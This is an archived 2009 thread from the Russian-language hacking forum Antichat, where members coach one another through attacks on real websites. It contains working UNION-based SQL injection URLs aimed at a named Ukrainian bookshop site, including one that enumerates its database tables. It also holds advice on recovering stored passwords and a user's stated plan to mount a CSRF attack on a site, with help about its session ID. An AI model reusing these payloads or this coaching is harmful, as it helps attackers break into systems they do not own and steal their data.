ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

21.01.2009, 21:05
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от pinky07
это поле password, а остальные поля login, email выводятся с нормальной кодировкой, кодировку я менял всеровно ничего не получается // это полюбому не в Хексе.
P.s щас попробую сам зарегаться и вывести свой пароль в этих кракозябрах=)))
Кодировка сдесь не причём, гораздо важнее какая база .
В Access такое бывает, какой-то алгоритм хеширования пароля
Если мускул , то или aes_encrypt(скорее всего), или самопис какой-то, по одному значению непонятно. С этим ты ничего не поделаешь, если только ключ угадаешь 
|
|
|

21.01.2009, 21:07
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Сообщение от TELO
А что это? При запросе version() выдаёт следуюшее
PostgreSQL 7.4.23 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)
database(),user() не проходят
скуль
Код:
http://www.bookzone.com.ua/catalog.php?cid=-11028 UNION SELECT version()
Так в чем проблема-то?
Код:
http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+0--
|
|
|

22.01.2009, 00:53
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме: 227123
Репутация:
122
|
|
Сообщение от R1dex
Так в чем проблема-то?
Код:
http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+0--
спасибо,нашол таблу. я просто не понял что за версия такая
|
|
|

22.01.2009, 01:10
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме: 227123
Репутация:
122
|
|
а скажите плиз,как перевести такой пасс ********
|
|
|

22.01.2009, 01:36
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
TELO в этой таблице нет пассов
http://www.postgresql.org/docs/7.4/static/view-pg-user.html
Ищи другую 
|
|
|

22.01.2009, 01:36
|
|
Участник форума
Регистрация: 27.02.2006
Сообщений: 261
Провел на форуме: 515774
Репутация:
71
|
|
а скажите плиз,как перевести такой пасс ********
мы под твоии звездами нифига не видим, если ты имеешь ввиду как вытащить пароль с под звезд есть спецом проги для етого в гугле пиши типо "стащить пароль из под звездочек"
|
|
|

22.01.2009, 01:41
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Сообщение от RekRut
мы под твоии звездами нифига не видим, если ты имеешь ввиду как вытащить пароль с под звезд есть спецом проги для етого в гугле пиши типо "стащить пароль из под звездочек"
Жжешь ))
Сори за оффтоп - не удержался ^^
|
|
|

22.01.2009, 02:05
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме: 244040
Репутация:
15
|
|
Как по вашему мнению за что может отвечать переменая сид в урл такого вида posting.php?mode=delete&p=40&sid=790c50da612628e41 f4f900a830920c5
Я понимаю может этот вопрос выглядил глупо,просто я пытаюсь осуществить на сайт атаку CSRF!Мне кажется эта переменая мне и мешает пишет мол ошибка сесии!Сильно не ругайте!
|
|
|

22.01.2009, 02:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
За идентификацию сессии и отвечает
|
|
|

22.01.2009, 02:21
|
|
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме: 161729
Репутация:
67
|
|
Скачай двиг и посмотри исходники, а если по сабжу то sid - session id
Последний раз редактировалось Артем Солнце; 22.01.2009 в 02:23..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|